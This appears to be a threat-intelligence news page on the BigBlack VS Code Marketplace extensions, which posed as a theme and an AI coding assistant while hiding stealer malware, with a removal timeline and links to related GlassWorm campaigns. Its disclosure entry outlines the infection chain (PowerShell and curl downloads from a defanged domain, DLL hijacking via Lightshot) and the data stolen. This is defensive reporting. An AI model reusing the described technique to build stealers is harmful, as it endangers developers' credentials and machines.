Find notable cyber news and cases, enriched with sources, timelines, and signals.
Home Browse News Feed Stats Watchlists Beta About Contact

BigBlack VS Code Marketplace stealer extensions

Malware Activity
First reported
Last updated
Happening score
H score 22
1 unique sources, 1 articles

Summary

Hide ▲

The discovery of malicious VS Code Marketplace extensions matters because they can quietly turn a developer workstation into a stealer platform and exfiltrate sensitive data within seconds. Two packages, BigBlack.bitcoin-black and BigBlack.codo-ai, posed as a premium theme and an AI coding assistant while hiding malicious code. A third package from the same publisher, BigBlack.mrbigblacktheme, was also removed for containing malware.

Related Happenings

MuddyWater broad cyber-espionage campaign across sectors and countries

Campaign
First: 14.05.2026 00:59 Last: 14.05.2026 00:59 Sources 1

About this happening: **MuddyWater** was tied to a **2026 espionage campaign** affecting **at least nine organizations** across **nine countries** on **four continents**, with victims in **industrial a...

Open Happening

GlassWorm OpenVSX sleeper extension campaign

Campaign
First: 28.04.2026 00:41 Last: 28.04.2026 00:41 Sources 1

About this happening: The **GlassWorm** operation has launched a **new wave** against **OpenVSX**, seeding **73 sleeper extensions** that become malicious after an **update** and can deliver malware to...

Open Happening

GlassWorm v2 cloned VS Code extension loaders

Malware Activity
First: 27.04.2026 14:23 Last: 27.04.2026 14:23 Sources 1

About this happening: The **GlassWorm v2** malware activity now uses **cloned VS Code extensions** on **Open VSX** to deliver payloads that steal credentials, deploy a **RAT**, and spread across multip...

Open Happening

GlassWorm Zig dropper infecting developer IDEs

Malware Activity
First: 10.04.2026 16:23 Last: 10.04.2026 16:23 Sources 1

About this happening: The **GlassWorm** malware set now uses a **Zig dropper** that can silently infect **all VS Code-based IDEs** on a developer's machine, widening the reach of the compromise. The pa...

Open Happening

GlassWorm supply-chain malware wave across GitHub, npm, and VSCode/OpenVSX

Malware Activity
First: 17.03.2026 23:42 Last: 17.03.2026 23:42 Sources 1

About this happening: **GlassWorm** returned in a **new coordinated supply-chain attack** that compromised **433 components** across **GitHub, npm, and VSCode/OpenVSX**, creating a broad software-distr...

Latest development: 28.04.2026 00:41

GlassWorm returned in an OpenVSX supply-chain wave with 73 cloned sleeper extensions that were benign at upload and later turned malicious after an update, with six already activated to deliver malware. The extensions act as thin loaders that fetch payloads through GitHub-hosted secondary VSIX packages, platform-specific .node modules, or heavily obfuscated JavaScript, shifting the campaign toward submitting innocuous extensions first and introducing the malicious payload later.

Open Happening

Timeline

  1. 09.12.2025 10:07 1 articles · 5mo ago

    Microsoft removes BigBlack.bitcoin-black from VS Code Marketplace

    Mitigation Patch Update

    Microsoft removed BigBlack.bitcoin-black from the Microsoft Visual Studio Code (VS Code) Marketplace on December 5, 2025 after the extension was identified as a malicious package that masqueraded as a premium dark theme and activated on every VS Code action to help infect developer machines with stealer malware.

    Show sources
    Open in new tab
  2. 09.12.2025 10:07 1 articles · 5mo ago

    Microsoft removes BigBlack.codo-ai from VS Code Marketplace

    Mitigation Patch Update

    Microsoft removed BigBlack.codo-ai from the Microsoft Visual Studio Code (VS Code) Marketplace on December 8, 2025 after the extension was identified as a malicious AI coding assistant that hid stealer malware inside a working tool to infect developer machines.

    Show sources
    Open in new tab
  3. 09.12.2025 10:07 2 articles · 5mo ago

    Researchers disclose malicious VS Code Marketplace extensions and payload chain

    Initial Disclosure

    Cybersecurity researchers disclosed that Microsoft Visual Studio Code (VS Code) Marketplace extensions BigBlack.bitcoin-black and BigBlack.codo-ai were designed to infect developer machines with stealer malware, and Microsoft also removed BigBlack.mrbigblacktheme from the same publisher for containing malware. The malicious extensions used PowerShell to download a password-protected ZIP from syn1112223334445556667778889990[.]org, later shifted to a batch script with curl, and then relied on the legitimate Lightshot binary and Lightshot.dll for DLL hijacking to collect clipboard contents, installed apps, running processes, desktop screenshots, stored Wi-Fi credentials, detailed system information, Google Chrome cookies, and Microsoft Edge sessions.

    Show sources
    Open in new tab